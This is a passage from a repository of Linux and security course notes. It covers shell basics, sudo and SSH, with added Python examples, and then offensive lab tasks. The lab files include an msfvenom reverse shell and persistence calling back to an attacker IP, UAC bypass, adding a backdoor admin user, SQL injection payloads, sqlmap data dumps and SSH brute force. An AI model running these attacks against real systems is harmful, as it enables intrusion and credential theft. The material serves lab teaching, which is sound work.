#### **Example:**
```bash
ls /wrongpath 2> /dev/null
```
- Errors are discarded and won’t show up.

> **Activity:** Try redirecting both stdout and stderr to `/dev/null`.
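As an added example (not from the tutorial), the Python below performs the same file-descriptor duplication the shell does for `cmd > out.log 2>&1` and `cmd 2>&1 > out.log`, which makes visible why the order of the two redirections in section 5b matters; the messages written are constructed stand-ins for a command's output.

```python
"""Shell redirection reproduced with the file-descriptor calls the shell uses.

Added example (not from the tutorial). The shell implements `>` and `2>&1`
with dup2(): `2>&1` makes fd 2 a copy of whatever fd 1 points at *right now*,
which is why `cmd > out.log 2>&1` and `cmd 2>&1 > out.log` behave differently.
The messages written are constructed stand-ins for a command's output.
"""
import os
import sys
import tempfile


def _slurp(path: str) -> bytes:
    with open(path, "rb") as fh:
        return fh.read()


def redirect_like_shell(order: str, out_msg=b"listing\n", err_msg=b"error\n"):
    """Apply two redirections in the given order, then write one line to each stream.

    order == "file_first" emulates:  cmd > out.log 2>&1
    order == "dup_first"  emulates:  cmd 2>&1 > out.log
    Returns (bytes that landed in out.log, bytes that reached the 'terminal').
    """
    sys.stdout.flush()
    sys.stderr.flush()
    saved_out, saved_err = os.dup(1), os.dup(2)      # so fds 1/2 can be restored
    term_fd, term_path = tempfile.mkstemp()          # stands in for the terminal
    log_fd, log_path = tempfile.mkstemp()            # stands in for out.log
    try:
        # Starting state of an interactive shell: both streams go to the terminal.
        os.dup2(term_fd, 1)
        os.dup2(term_fd, 2)
        if order == "file_first":
            os.dup2(log_fd, 1)   # > out.log : fd 1 now points at the file
            os.dup2(1, 2)        # 2>&1      : fd 2 becomes a copy of fd 1 (the file)
        elif order == "dup_first":
            os.dup2(1, 2)        # 2>&1      : fd 2 becomes a copy of fd 1 (still the terminal)
            os.dup2(log_fd, 1)   # > out.log : only fd 1 moves; fd 2 keeps the terminal
        else:
            raise ValueError(f"unknown order {order!r}")
        os.write(1, out_msg)     # what the command prints on stdout
        os.write(2, err_msg)     # what the command prints on stderr
    finally:
        os.dup2(saved_out, 1)
        os.dup2(saved_err, 2)
        for fd in (saved_out, saved_err, term_fd, log_fd):
            os.close(fd)
    try:
        return _slurp(log_path), _slurp(term_path)
    finally:
        os.unlink(log_path)
        os.unlink(term_path)


if __name__ == "__main__":
    for order in ("file_first", "dup_first"):
        log, term = redirect_like_shell(order)
        print(f"{order:<11} out.log={log!r:<22} terminal={term!r}")
```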
--------------------------------------------------------------------------------
/week3/shell_basics.md:
--------------------------------------------------------------------------------
## **1. Understanding the Linux Shell**
The **Linux shell** is a command-line interface (CLI) that allows users to interact with the operating system. It acts as a middleman between the user and the kernel, enabling users to execute commands, automate tasks, and manage files.

### **Common Shells in Linux**
| Shell | Description |
|-------|------------|
| **Bourne Shell (sh)** | The original UNIX shell, lightweight and minimal. |
| **C Shell (csh)** | Uses C-like syntax, suitable for programmers. |
| **Korn Shell (ksh)** | An improved version of `sh` with additional scripting features. |
| **Bourne Again Shell (bash)** | The most widely used shell, with many powerful features. |

> **Activity**: Run `echo $SHELL` in the terminal to check which shell is currently in use.

---

## **2. Basic Shell Commands**
Here are some essential commands for beginners:

### **a. Navigating Directories**
- `pwd` → Print the current working directory.
- `ls` → List files and directories.
- `cd` → Change directories.

**Example:**
```bash
pwd
cd /home/user/Documents
ls -l
```

> **Activity**: Create a directory, navigate to it, and check its contents using the commands above.

---

### **b. File and Directory Management**
| Command | Description |
|---------|------------|
| `mkdir myfolder` | Create a new directory. |
| `rmdir myfolder` | Remove an empty directory. |
| `touch file.txt` | Create a new file. |
| `rm file.txt` | Delete a file. |
| `cp file.txt /tmp/` | Copy a file. |
| `mv file.txt newfile.txt` | Rename (move) a file. |

> **Activity**: Create, rename, copy, and delete files inside a directory.

---

### **c. Viewing and Editing Files**
| Command | Description |
|---------|------------|
| `cat file.txt` | View file contents. |
| `nano file.txt` | Open a file in the `nano` text editor. |
| `less file.txt` | View large files one page at a time. |
| `head -n 5 file.txt` | View the first 5 lines. |
| `tail -n 5 file.txt` | View the last 5 lines. |

> **Activity**: Create a text file, add content using `nano`, and view it using `cat`, `less`, and `tail`.

---

### **d. File Permissions and Ownership**
| Command | Description |
|---------|------------|
| `ls -l` | View file permissions. |
| `chmod 755 file.sh` | Change file permissions. |
| `chown user:group file.sh` | Change file ownership. |

**Example:**
```bash
chmod +x script.sh   # Give execute permission
ls -l script.sh      # Check permissions
```

> **Activity**: Create a script, modify its permissions, and run it.

---

## **3. Introduction to Linux Scripting**
**Bash scripting** allows users to automate tasks using commands inside a script file.

**Example Script:**
```bash
#!/bin/bash
echo "Hello, $(whoami)! Welcome to Linux."
date
```
Save this script as `hello.sh`, then run:
```bash
chmod +x hello.sh
./hello.sh
```

> **Activity**: Write and execute a simple script that prints "Hello, Linux!"

---

## **4. Advanced Shell Features**
### **a. Redirection & Piping**
- `>` → Redirect output to a file.
- `>>` → Append output to a file.
- `|` → Pipe output from one command to another.
**Example:**
```bash
ls -l > file_list.txt             # Save output to a file
cat file_list.txt | grep ".txt"   # Find files with ".txt" in their name
```

> **Activity**: Use redirection and pipes to filter and save command output.

---

### **b. Process Management**
- `ps` → Show running processes.
- `top` → Monitor system resources.
- `kill ` → Terminate a process.
- `htop` → Interactive process manager (if installed).

**Example:**
```bash
ps aux | grep firefox   # Find the Firefox process
kill                    # Replace with the actual process ID
```

> **Activity**: List running processes and terminate a selected process.

--------------------------------------------------------------------------------
/week3/super_user.md:
--------------------------------------------------------------------------------
# **Super User in Linux**

In Linux, the **Super User** (also known as the **root user**) is a special user account with **unrestricted access** to the system. The root user has full control over the operating system, including:

✅ **Installing or removing software**
✅ **Modifying system configurations**
✅ **Managing user accounts and permissions**
✅ **Accessing and modifying all files**
✅ **Changing system settings and kernel parameters**

---

## **1. Dangers of the Root User**
The **root account** is very powerful, but **misuse** can lead to:
⚠️ **Accidental deletion of critical system files**
⚠️ **System crashes due to incorrect configuration changes**
⚠️ **Security vulnerabilities if used carelessly**

For this reason, it is recommended to **use root privileges only when necessary**.

---

## **2. Switching to Super User with `su`**
The `su` (switch user) command allows switching to another user, including root.
25 | 26 | ### **Example: Switching to Root** 27 | ```bash 28 | su 29 | ``` 30 | - You will be asked for the **root password**. 31 | - Once authenticated, you will have a **root shell** (`#` instead of `$`). 32 | 33 | 🔴 **Warning:** When using `su`, all commands will run as root until you exit. 34 | 35 | ### **Switching to Another User** 36 | ```bash 37 | su username 38 | ``` 39 | - This allows switching to another **regular user** instead of root. 40 | 41 | ### **Exit from Root Mode** 42 | To return to a normal user: 43 | ```bash 44 | exit 45 | ``` 46 | 47 | --- 48 | 49 | ## **3. Using `sudo` for Root Privileges** 50 | The `sudo` (superuser do) command allows running **specific** commands as root **without switching users**. 51 | 52 | ### **Example: Running a Command as Root** 53 | ```bash 54 | sudo apt update 55 | sudo systemctl restart apache2 56 | ``` 57 | - It **prompts for your password**, not the root password. 58 | - It **logs** the command usage for security auditing. 59 | 60 | 🔒 **Why Use `sudo` Instead of `su`?** 61 | ✅ More secure (doesn’t give full root access) 62 | ✅ Logs commands for tracking 63 | ✅ Temporary root access 64 | 65 | --- 66 | 67 | ## **4. Granting a User `sudo` Privileges** 68 | To allow a user to use `sudo`, add them to the **sudoers group**. 69 | 70 | ### **Step 1: Add User to Sudo Group** 71 | ```bash 72 | usermod -aG sudo username 73 | ``` 74 | 75 | ### **Step 2: Verify** 76 | ```bash 77 | sudo whoami 78 | ``` 79 | **Output:** 80 | ``` 81 | root 82 | ``` 83 | This confirms the user can run commands as root. 84 | 85 | --- 86 | 87 | ## **5. Running a Shell as Root (`sudo -i` or `sudo su`)** 88 | ### **Open an Interactive Root Shell** 89 | ```bash 90 | sudo -i 91 | ``` 92 | or 93 | ```bash 94 | sudo su 95 | ``` 96 | - This gives a **persistent** root shell (`#` prompt). 97 | - **Dangerous** if commands are misused. 98 | 99 | To exit: 100 | ```bash 101 | exit 102 | ``` 103 | 104 | --- 105 | 106 | ## **6. 
Editing the `sudoers` File (Advanced)** 107 | The **`/etc/sudoers`** file defines `sudo` privileges. To safely edit it, use: 108 | ```bash 109 | sudo visudo 110 | ``` 111 | This prevents syntax errors that could lock you out. 112 | 113 | --- 114 | 115 | ## **7. Checking Sudo Access for a User** 116 | To see if a user has `sudo` privileges: 117 | ```bash 118 | sudo -l 119 | ``` 120 | 121 | --- 122 | 123 | ## **8. Restricting Root Access** 124 | To **disable direct root login**, edit: 125 | ```bash 126 | sudo nano /etc/ssh/sshd_config 127 | ``` 128 | Find: 129 | ```bash 130 | PermitRootLogin yes 131 | ``` 132 | Change to: 133 | ```bash 134 | PermitRootLogin no 135 | ``` 136 | Then restart SSH: 137 | ```bash 138 | sudo systemctl restart ssh 139 | ``` 140 | 141 | --- 142 | 143 | ## **Conclusion** 144 | - Use **`sudo`** for safer privilege escalation. 145 | - Use **`su`** only if you need a full root session. 146 | - Be careful with root privileges to avoid damaging the system. 147 | 148 | --- 149 | 150 | ### **🔍 Hands-On Activities** 151 | 1️⃣ Try switching to root using `su` and then `exit`. 152 | 2️⃣ Use `sudo` to install a package (`sudo apt install htop`). 153 | 3️⃣ Check sudo access with `sudo -l`. 154 | 4️⃣ Disable direct root login via SSH for security. 155 | -------------------------------------------------------------------------------- /week2/day9_ssh.md: -------------------------------------------------------------------------------- 1 | ### **SSH (Secure Shell): A Cornerstone of Secure Remote Communication** 2 | 3 | In Linux networking, **Secure Shell (SSH)** is a cryptographic protocol designed to provide secure, encrypted communication between two networked devices. It is an essential tool for system administrators, developers, and anyone managing remote servers. SSH ensures the confidentiality, integrity, and authenticity of data transmission, making it far superior to non-secure alternatives like Telnet or FTP. 
4 | 5 | --- 6 | 7 | ### **Key Features of SSH** 8 | 9 | 1. **Secure Remote Login**: Enables secure access to remote systems for administrative tasks. 10 | 2. **Remote Command Execution**: Run commands on remote machines without direct physical access. 11 | 3. **File Transfers**: Securely transfer files between systems using tools like `scp` or `rsync`. 12 | 4. **Tunneling**: Forward ports securely over the SSH connection, providing encrypted access to other services. 13 | 5. **Public Key Authentication**: Offers password-less login via public-private key pairs for enhanced security. 14 | 15 | --- 16 | 17 | ### **Basic SSH Usage** 18 | 19 | #### **Command Syntax** 20 | ```bash 21 | ssh username@server_ip_address 22 | ``` 23 | - **`username`**: The user account on the remote server. 24 | - **`server_ip_address`**: The IP address or hostname of the remote server. 25 | 26 | After running this command, you’ll be prompted to enter the password for the specified user. Upon successful authentication, you'll gain remote access to the server. 27 | 28 | #### **Example** 29 | ```bash 30 | ssh admin@192.168.1.100 31 | ``` 32 | 33 | --- 34 | 35 | ### **Advanced SSH Usage** 36 | 37 | 1. **Specify a Custom Port** 38 | By default, SSH uses port 22. To connect to a server running SSH on a different port: 39 | ```bash 40 | ssh -p 2222 username@server_ip_address 41 | ``` 42 | 43 | 2. **Copy Files Using `scp`** 44 | ```bash 45 | scp localfile.txt username@server_ip_address:/remote/path/ 46 | ``` 47 | This securely transfers `localfile.txt` to the remote server. 48 | 49 | 3. **Generate SSH Key Pair for Password-less Login** 50 | ```bash 51 | ssh-keygen -t rsa 52 | ssh-copy-id username@server_ip_address 53 | ``` 54 | This generates a key pair and copies the public key to the remote server for password-less access. 55 | 56 | 4. 
**SSH Tunneling** 57 | Forward a local port to a remote server: 58 | ```bash 59 | ssh -L local_port:remote_host:remote_port username@server_ip_address 60 | ``` 61 | 62 | --- 63 | 64 | ### **SSH Configuration** 65 | 66 | SSH client and server behavior can be customized via configuration files: 67 | 68 | - **Client Config**: `/etc/ssh/ssh_config` or `~/.ssh/config` 69 | - **Server Config**: `/etc/ssh/sshd_config` 70 | 71 | #### Example: Customizing the Client Configuration 72 | Add the following to `~/.ssh/config`: 73 | ```plaintext 74 | Host myserver 75 | HostName 192.168.1.100 76 | User admin 77 | Port 2222 78 | ``` 79 | Now you can connect to the server with: 80 | ```bash 81 | ssh myserver 82 | ``` 83 | 84 | --- 85 | 86 | ### **Security Best Practices** 87 | 88 | 1. **Disable Root Login**: Prevent direct root access by setting `PermitRootLogin no` in `/etc/ssh/sshd_config`. 89 | 2. **Use Public Key Authentication**: Replace password authentication with key-based authentication for stronger security. 90 | 3. **Change the Default SSH Port**: Use a non-standard port to reduce automated attacks. 91 | 4. **Enable Fail2Ban**: Protect against brute-force attacks by blocking repeated failed login attempts. 92 | 5. **Disable SSH for Unnecessary Users**: Restrict access by configuring `AllowUsers` or `AllowGroups` in the SSH server configuration. 93 | 94 | --- 95 | 96 | ### **Practical Applications of SSH** 97 | 98 | - **Remote System Management**: Manage servers without needing physical access. 99 | - **Secure File Transfers**: Protect sensitive data during transfers. 100 | - **Encrypted Communication**: Securely communicate over potentially insecure networks. 101 | - **Port Forwarding and Tunneling**: Access remote services securely over an SSH tunnel. 102 | 103 | By understanding and effectively using SSH, administrators and users can maintain secure and efficient access to Linux systems, ensuring data privacy and integrity in networking environments. 
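As an added example (not part of these notes), the following Python script audits an `sshd_config` for the settings listed in the best-practices section above and in the super-user notes' section on restricting root login. The two configurations it reads are constructed inline, and the helper names `parse_sshd_config` and `audit_sshd_config` are the example's own.

```python
"""Audit an sshd_config for the hardening settings discussed in these notes.

Added example, not from the original notes. It follows sshd's own parsing
rules: keywords are case-insensitive, '#' starts a comment, and for each
keyword the FIRST value wins. Only the global section is checked; lines after
the first 'Match' block are conditional and are reported for manual review.
"""
import re
from typing import Dict, List, Tuple

# Constructed sample: a weak configuration beside a hardened one.
WEAK_SSHD_CONFIG = """
# Sample sshd_config (constructed for the demo)
Port 22
PermitRootLogin yes
PasswordAuthentication yes
PermitRootLogin no        # ignored by sshd: the first value wins
"""

HARDENED_SSHD_CONFIG = """
Port 2222
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
AllowGroups sshusers
Match User backup
    PasswordAuthentication yes
"""

# Values OpenSSH applies when a keyword is absent from the file.
DEFAULTS = {
    "permitrootlogin": "prohibit-password",
    "passwordauthentication": "yes",
    "pubkeyauthentication": "yes",
    "port": "22",
}


def parse_sshd_config(text: str) -> Tuple[Dict[str, str], List[str]]:
    """Return (global_settings, match_lines).

    global_settings maps lower-cased keyword -> first value seen before any
    Match block; match_lines keeps the raw conditional lines verbatim.
    """
    settings: Dict[str, str] = {}
    match_lines: List[str] = []
    in_match = False
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments
        if not line:
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)  # 'Key value' or 'Key=value'
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        if key == "match":
            in_match = True
        if in_match:
            match_lines.append(line)
            continue
        settings.setdefault(key, value)              # first occurrence wins
    return settings, match_lines


def audit_sshd_config(text: str) -> List[str]:
    """Return a list of findings; an empty list means every check passed."""
    settings, match_lines = parse_sshd_config(text)
    effective = {k: settings.get(k, d) for k, d in DEFAULTS.items()}
    findings: List[str] = []
    if effective["permitrootlogin"].lower() != "no":
        findings.append(f"PermitRootLogin is '{effective['permitrootlogin']}'; set it to 'no'")
    if effective["passwordauthentication"].lower() != "no":
        findings.append("PasswordAuthentication is enabled; switch to key-based authentication")
    if effective["pubkeyauthentication"].lower() != "yes":
        findings.append("PubkeyAuthentication is disabled")
    if "allowusers" not in settings and "allowgroups" not in settings:
        findings.append("No AllowUsers/AllowGroups restriction is configured")
    if effective["port"] == "22":
        findings.append("SSH listens on the default port 22")
    for line in match_lines:
        if line.lower().startswith("match"):
            findings.append(f"Conditional block present, review manually: '{line}'")
    return findings


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_SSHD_CONFIG), ("hardened", HARDENED_SSHD_CONFIG)):
        print(f"== {name} ==")
        for finding in audit_sshd_config(cfg) or ["all checks passed"]:
            print(" -", finding)
```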

-------------------------------------------------------------------------------- /projects/Post-exploitation-task.md: --------------------------------------------------------------------------------
**Privilege Escalation Task**

**Objective**
Escalate privileges on a Windows 7 or Windows 8 machine by identifying vulnerabilities and exploiting them to gain administrator or system-level access.

**Requirements**
- Kali Linux virtual machine (Metasploit, PowerSploit, and Windows Exploit Suggester)
- Windows 7 or Windows 8 virtual machine (standard user account)
- Virtual environment (VirtualBox or VMware with NAT/Host-Only Network)
- Required tools:
  - Metasploit Framework
  - Windows Exploit Suggester
  - PowerShell scripts (PowerUp, Invoke-AllChecks)

---

### **Part 1: Gaining Initial Access**

1. **Generate a Meterpreter Reverse Shell Payload** using msfvenom:
```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=4444 -f exe > shell.exe
```
2. **Deliver the Payload** to the Windows machine through any method such as:
   - USB drive (simulated)
   - Social engineering (simulated)
   - Execution via PowerShell
   - Exposing it to the internet using apache2
3. **Set Up a Listener in Metasploit:**
```
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <attacker_ip>
set LPORT 4444
exploit -j
```
4. **Execute the Payload on Windows 7/8** and establish a connection.

---

### **Part 2: Privilege Escalation**

#### **Step 1: Identify Privileges**
Inside Meterpreter, check the current user:
```
getuid
```
Check system information:
```
sysinfo
```

#### **Step 2: Use Automated Privilege Escalation Tools**

**Option 1: Metasploit GetSystem**
```
use post/windows/escalate/getsystem
run
```

**Option 2: Migrate to a High-Privilege Process**
1. List running processes:
```
ps
```
2. Identify a process owned by SYSTEM (e.g., winlogon.exe, lsass.exe).
3. Migrate into the process:
```
migrate <PID>
```
4. Verify privilege level:
```
getuid
```

**Option 3: PowerShell Privilege Escalation (Manual)**
1. Upload and execute PowerUp:
```
upload /usr/share/windows-resources/powerup.ps1 C:\\Users\\Public\\powerup.ps1
```
```
powershell -ExecutionPolicy Bypass -File C:\\Users\\Public\\powerup.ps1
```
2. Identify misconfigured services, unquoted service paths, or DLL hijacking opportunities.

#### **Step 3: Exploit a Local Vulnerability**
1. On Kali, download the Windows Exploit Suggester:
```
git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester.git
```
2. Collect Windows system information:
```
systeminfo > win7info.txt
```
3. Run the exploit suggester:
```
python windows-exploit-suggester.py -i win7info.txt -d exploits.csv
```
4. Identify a suitable exploit (e.g., CVE-2016-0099) and execute it.

#### **Step 4: Bypass UAC (User Account Control)**
If the user is in the Administrators group but blocked by UAC, try:
```
use exploit/windows/local/bypassuac
set SESSION 1
exploit
```

---

### **Part 3: Post-Exploitation**

1. **Create a New Admin User:**
```
net user hacker P@ssw0rd /add
net localgroup administrators hacker /add
```
2. **Set Up Persistence:**
```
run persistence -U -i 5 -p 4444 -r <attacker_ip>
```

---

### **Evaluation Criteria**
You will be assessed based on the following criteria:
- Successfully gaining initial access to the Windows 7/8 machine.
- Using at least two different privilege escalation techniques.
- Documenting each step taken and explaining obstacles encountered.
- Demonstrating post-exploitation tasks such as creating a new user and establishing persistence.

---

### **Bonus Challenges**
- Exploit unquoted service paths.
- Perform DLL hijacking.
- Set up scheduled tasks for persistence.
- Use Mimikatz for credential dumping.

-------------------------------------------------------------------------------- /projects/exploiting_sql_injection.md: --------------------------------------------------------------------------------
## SQL Injection (SQLi)

## **1. Introduction to SQL Injection**
SQL Injection (SQLi) is a web security vulnerability that allows an attacker to manipulate SQL queries executed by an application. This can lead to unauthorized access, data leakage, or even full database compromise.

### **1.1 How SQL Injection Works**
When a web application does not properly validate or sanitize user inputs, an attacker can inject malicious SQL code into database queries.
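As an added example (not part of these notes), the login lookup discussed here is run two ways against an in-memory SQLite table: built by string formatting, so that an `admin' --` username truncates the query, and with the `?` placeholders recommended in the prevention sections of these SQLi notes. The table, its two accounts and the function names are constructed for the demo.

```python
"""Vulnerable vs. parameterized login lookup, runnable against SQLite.

Added example, not from the original notes. SQLite is used only because it
ships with Python; the behaviour is the same for MySQL or any other SQL
database. Passwords are stored in plaintext purely to mirror the notes'
query; real systems store password hashes.
"""
import sqlite3
from typing import Optional


def make_db() -> sqlite3.Connection:
    """Create an in-memory users table with two constructed accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("admin", "correct horse"), ("alice", "hunter2")],
    )
    return conn


def build_vulnerable_query(username: str, password: str) -> str:
    """The notes' query, built by string formatting. User input becomes SQL."""
    return (
        f"SELECT username FROM users WHERE username = '{username}' "
        f"AND password = '{password}'"
    )


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> Optional[str]:
    """Return the matched username or None. `admin' --` bypasses the password check."""
    row = conn.execute(build_vulnerable_query(username, password)).fetchone()
    return row[0] if row else None


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> Optional[str]:
    """Same lookup with placeholders: input is bound as data, never parsed as SQL."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    for user, pw in [("admin", "correct horse"), ("admin' --", ""), ("' OR 1=1 --", "")]:
        print(f"input {user!r}/{pw!r}: vulnerable -> {login_vulnerable(db, user, pw)!r}, "
              f"parameterized -> {login_parameterized(db, user, pw)!r}")
```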
8 | 9 | For example, consider the following vulnerable query: 10 | 11 | ```sql 12 | SELECT * FROM users WHERE username = '$input_username' AND password = '$input_password'; 13 | ``` 14 | If a user inputs `admin' --` as the username, the query becomes: 15 | 16 | ```sql 17 | SELECT * FROM users WHERE username = 'admin' --' AND password = ''; 18 | ``` 19 | The `--` makes the rest of the query a comment, effectively bypassing authentication. 20 | 21 | --- 22 | 23 | ## **2. Types of SQL Injection Attacks** 24 | 1. **Error-Based SQL Injection** – Uses database error messages to extract information. 25 | 2. **Union-Based SQL Injection** – Uses the `UNION` SQL operator to combine results from different queries. 26 | 3. **Boolean-Based (Blind) SQL Injection** – Exploits conditional responses (True/False) without error messages. 27 | 4. **Time-Based (Blind) SQL Injection** – Uses SQL commands like `SLEEP()` to determine if a query is vulnerable. 28 | 5. **Out-of-Band SQL Injection** – Uses external channels (e.g., DNS or HTTP requests) to extract data. 29 | 30 | --- 31 | 32 | ## **3. Manually Testing for SQL Injection** 33 | 34 | ### **3.1 Identifying Vulnerable Parameters** 35 | 1. Use `'` (single quote) in input fields. If an error occurs, the input is likely vulnerable. 36 | 2. Use common SQL payloads like: 37 | 38 | ``` 39 | ' OR 1=1 -- 40 | ' UNION SELECT null, version() -- 41 | ``` 42 | 43 | 3. Check for database errors in responses (e.g., `MySQL syntax error` or `Unclosed quotation mark after the character string`). 44 | 45 | ### **3.2 Common SQLi Payloads** 46 | - **Bypassing Login** 47 | ``` 48 | admin' -- 49 | ' OR 1=1 -- 50 | ' OR '1'='1' -- 51 | ``` 52 | 53 | - **Extracting Database Version** 54 | ``` 55 | ' UNION SELECT null, @@version -- 56 | ``` 57 | 58 | - **Enumerating Database Tables (MySQL)** 59 | ``` 60 | ' UNION SELECT table_name, NULL FROM information_schema.tables WHERE table_schema=database() -- 61 | ``` 62 | 63 | --- 64 | 65 | ## **4. 
Automating SQL Injection with SQLmap** 66 | SQLmap is a powerful tool for automating SQL injection testing. 67 | 68 | ### **4.1 Installing SQLmap** 69 | On Kali Linux, SQLmap is pre-installed. If not, install it using: 70 | ```bash 71 | sudo apt install sqlmap 72 | ``` 73 | For other systems: 74 | ```bash 75 | pip install sqlmap 76 | ``` 77 | 78 | ### **4.2 Basic SQLmap Usage** 79 | Run SQLmap against a vulnerable URL: 80 | ```bash 81 | sqlmap -u "http://target.com/page.php?id=1" --dbs 82 | ``` 83 | This command: 84 | - Tests `id=1` for SQL injection 85 | - Lists all available databases 86 | 87 | ### **4.3 Extracting Tables & Columns** 88 | Find tables in a specific database: 89 | ```bash 90 | sqlmap -u "http://target.com/page.php?id=1" -D database_name --tables 91 | ``` 92 | Find columns in a table: 93 | ```bash 94 | sqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name --columns 95 | ``` 96 | 97 | ### **4.4 Dumping Data** 98 | To extract usernames and passwords: 99 | ```bash 100 | sqlmap -u "http://target.com/page.php?id=1" -D database_name -T users --dump 101 | ``` 102 | 103 | ### **4.5 Bypassing Login with SQLmap** 104 | ```bash 105 | sqlmap -u "http://target.com/login.php" --data="username=admin&password=123" --dump 106 | ``` 107 | This automates SQL injection in login forms. 108 | 109 | --- 110 | 111 | ## **5. Preventing SQL Injection** 112 | 113 | - Use **Prepared Statements (Parameterized Queries)** 114 | ```python 115 | cursor.execute("SELECT * FROM users WHERE username = ? 
AND password = ?", (username, password)) 116 | ``` 117 | 118 | - **Input Validation & Whitelisting** 119 | - **Least Privilege for Database Users** 120 | - **Web Application Firewalls (WAF)** 121 | - **Regular Security Audits & Penetration Testing** 122 | -------------------------------------------------------------------------------- /projects/metasploit_network_cap.md: -------------------------------------------------------------------------------- 1 | ### **Setting Up a Metasploitable Network and Capturing Traffic with Wireshark in Kali** 2 | --- 3 | 4 | ## **Requirements** 5 | **Virtual Machines (VMs)** 6 | - **Kali Linux** (Attacker Machine) 7 | - **Metasploitable 2** (Target Machine) 8 | 9 | **Tools Needed** 10 | - **VMware/VirtualBox** (To run the virtual machines) 11 | - **Wireshark** (For packet capture) 12 | - **Metasploit Framework** (For attacking the target) 13 | 14 | **Network Configuration** 15 | - Set both VMs to **Host-Only Network** or **NAT with Port Forwarding** 16 | - Kali will act as the **attacker** 17 | - Metasploitable will be the **victim** 18 | 19 | ## **Setting Up Metasploitable 2** 20 | *Metasploitable is a deliberately vulnerable Linux machine for penetration testing.* 21 | 22 | ### **Steps to Install Metasploitable:** 23 | **Download Metasploitable 2:** 24 | - Get the **OVA file** from [here](https://sourceforge.net/projects/metasploitable/). 25 | 26 | **Import into VirtualBox/VMware:** 27 | - Open VirtualBox → `File` → `Import Appliance` → Select **Metasploitable.ova** 28 | 29 | 3**Network Settings:** 30 | - Go to **Settings → Network** 31 | - Set **Adapter 1** to **Host-Only Adapter** (or NAT) 32 | 33 | **Start Metasploitable and Get IP Address:** 34 | - Login with: 35 | ```plaintext 36 | Username: msfadmin 37 | Password: msfadmin 38 | ``` 39 | - Run: 40 | ```bash 41 | ifconfig 42 | ``` 43 | - Note the **IP address** (e.g., `192.168.56.101`). 
44 | 45 | ## **Setting Up Kali Linux** 46 | *Kali Linux will be used to attack Metasploitable and capture network traffic.* 47 | 48 | ### **Steps:** 49 | **Open Kali Linux in VirtualBox/VMware** 50 | **Network Settings:** 51 | - Set **Adapter 1** to **Host-Only Adapter** (same as Metasploitable) 52 | **Confirm Network Connection:** 53 | - Open a terminal in Kali and ping Metasploitable: 54 | ```bash 55 | ping 192.168.56.101 56 | ``` 57 | - If successful, your network is properly configured. 58 | 59 | ## **Capturing Network Traffic with Wireshark** 60 | *Wireshark will capture all traffic between Kali and Metasploitable.* 61 | 62 | ### **Steps to Capture Traffic:** 63 | **Open Wireshark in Kali:** 64 | ```bash 65 | wireshark & 66 | ``` 67 | **Select Your Network Interface:** 68 | - Choose `eth0` (or the interface that connects to Metasploitable). 69 | **Start Capturing:** 70 | - Click **Start Capture** (Blue Shark Fin icon). 71 | 72 | ## **Simulating an Attack & Capturing Credentials** 73 | *Now, we will simulate a login attack and capture credentials.* 74 | 75 | ### **Step 1: Connect to Metasploitable via Telnet (Unencrypted Protocol)** 76 | 1. In Kali, run: 77 | ```bash 78 | telnet 192.168.56.101 79 | ``` 80 | 2. Enter **any username & password** (doesn’t matter if correct). 81 | 82 | ### **Step 2: Capture Credentials in Wireshark** 83 | 1. In Wireshark, apply a filter to see Telnet traffic: 84 | ```plaintext 85 | telnet 86 | ``` 87 | 2. Look for **login credentials** in plain text! 88 | 89 | ## **5️⃣ Advanced Attack: Exploiting SSH with Metasploit** 90 | 📌 *Now, we will use Metasploit to attack an SSH service and capture network traffic.* 91 | 92 | ### **Step 1: Scan for Open Ports on Metasploitable** 93 | 1️⃣ In Kali, run: 94 | ```bash 95 | nmap -sV 192.168.56.101 96 | ``` 97 | 2️⃣ Look for **port 22 (SSH)** in the results. 
98 | 99 | ### **Step 2: Run an SSH Brute Force Attack** 100 | 1️⃣ Open Metasploit: 101 | ```bash 102 | msfconsole 103 | ``` 104 | 2️⃣ Use the SSH brute-force module: 105 | ```bash 106 | use auxiliary/scanner/ssh/ssh_login 107 | set RHOSTS 192.168.56.101 108 | set USERNAME msfadmin 109 | set PASSWORD msfadmin 110 | run 111 | ``` 112 | 113 | ### **Step 3: Capture SSH Attack in Wireshark** 114 | 1️⃣ In Wireshark, apply the filter: 115 | ```plaintext 116 | ssh 117 | ``` 118 | 2️⃣ Observe the brute-force attack attempts! 119 | 120 | --- 121 | 122 | ## **🎯 Outcome** 123 | ✔️ Successfully captured **Telnet & SSH traffic**. 124 | ✔️ Extracted **plaintext credentials** from unencrypted traffic. 125 | ✔️ Identified attack patterns using **Wireshark**. 126 | -------------------------------------------------------------------------------- /projects/auto_qlinjection.md: -------------------------------------------------------------------------------- 1 | ## **Exploiting SQL Injection on DVWA Using SQLmap and Metasploit** 2 | 3 | In this guide, we’ll exploit **Damn Vulnerable Web Application (DVWA)** using **SQLmap** to find an SQL Injection vulnerability and then use **Metasploit** to gain a reverse shell. 4 | 5 | --- 6 | 7 | ## **1. Setting Up the DVWA Environment** 8 | ### **1.1 Install DVWA on Kali Linux** 9 | If you don’t already have DVWA installed, set it up using: 10 | 11 | ```bash 12 | sudo apt update 13 | sudo apt install apache2 mariadb-server php php-mysqli php-gd libapache2-mod-php 14 | ``` 15 | 16 | Download and set up DVWA: 17 | ```bash 18 | git clone https://github.com/digininja/DVWA.git /var/www/html/dvwa 19 | sudo chmod -R 777 /var/www/html/dvwa 20 | sudo chown -R www-data:www-data /var/www/html/dvwa 21 | sudo systemctl restart apache2 mariadb 22 | ``` 23 | 24 | ### **1.2 Configure DVWA** 25 | 1. Navigate to `http://localhost/dvwa/setup.php`. 26 | 2. Click 